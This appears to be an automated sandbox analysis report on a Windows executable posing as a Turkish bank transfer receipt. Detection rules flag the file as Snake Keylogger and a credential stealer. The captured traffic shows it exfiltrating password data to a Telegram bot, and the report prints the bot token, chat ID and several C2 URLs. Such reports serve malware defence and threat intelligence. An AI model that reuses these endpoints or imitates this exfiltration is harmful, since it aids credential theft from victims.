Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BE386h	6_2_056BE0B8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B6733h	6_2_056B6488
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then mov esp, ebp	6_2_056BB081
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B0741h	6_2_056B0498
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B2A01h	6_2_056B2758
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B55D1h	6_2_056B5328
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B79C9h	6_2_056B7720
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BD5D6h	6_2_056BD308
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B25A9h	6_2_056B2300
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BB5E6h	6_2_056BB318
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B5E81h	6_2_056B5BD8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BBA76h	6_2_056BB7A8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B2E59h	6_2_056B2BB0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BFA56h	6_2_056BF788
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B5A29h	6_2_056B5780
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BDA66h	6_2_056BD798
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BF136h	6_2_056BEE68
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B4D21h	6_2_056B4A78
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BD146h	6_2_056BCE78
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B7119h	6_2_056B6E70
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B1CF9h	6_2_056B1A50
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B48C9h	6_2_056B4620
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B6CC1h	6_2_056B6A18
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056BF5C6h	6_2_056BF2F8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B7571h	6_2_056B72C8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B5179h	6_2_056B4ED0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 4x nop then jmp 056B2151h	6_2_056B1EA8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49839 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49882 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:082561%0D%0ADate%20and%20Time:%2010/01/2025%20/%2003:04:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20082561%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31909a832222Host: api.telegram.orgContent-Length: 580

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49759 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49740 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49752 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49766 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49797 -> 104.21.96.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49746 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:082561%0D%0ADate%20and%20Time:%2010/01/2025%20/%2003:04:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20082561%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31909a832222Host: api.telegram.orgContent-Length: 580

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 18:11:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1384724354.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe, 00000006.00000002.3800099340.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49839 version: TLS 1.2

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3ae4588.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe.3aa1b68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.3797686063.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1385532363.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7292, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe PID: 7540, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_00F73E28	0_2_00F73E28
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_00F7E214	0_2_00F7E214
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_00F77019	0_2_00F77019
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F0F3D1	0_2_06F0F3D1
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F05D18	0_2_06F05D18
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F08620	0_2_06F08620
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F08DB8	0_2_06F08DB8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F08DA8	0_2_06F08DA8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F4D7F0	0_2_06F4D7F0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F43628	0_2_06F43628
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F49628	0_2_06F49628
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F447CF	0_2_06F447CF
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F4AFB8	0_2_06F4AFB8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F45F10	0_2_06F45F10
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F4CAE0	0_2_06F4CAE0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_06F47340	0_2_06F47340
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088B4988	0_2_088B4988
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088B51F8	0_2_088B51F8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088BC4B8	0_2_088BC4B8
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088B4DC0	0_2_088B4DC0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088B65F0	0_2_088B65F0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088B6600	0_2_088B6600
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088B6FA3	0_2_088B6FA3
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 0_2_088B6FB0	0_2_088B6FB0
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDA088	6_2_00FDA088
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDC146	6_2_00FDC146
Source: C:\Users\user\Desktop\dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Code function: 6_2_00FDD278	6_2_00FDD278
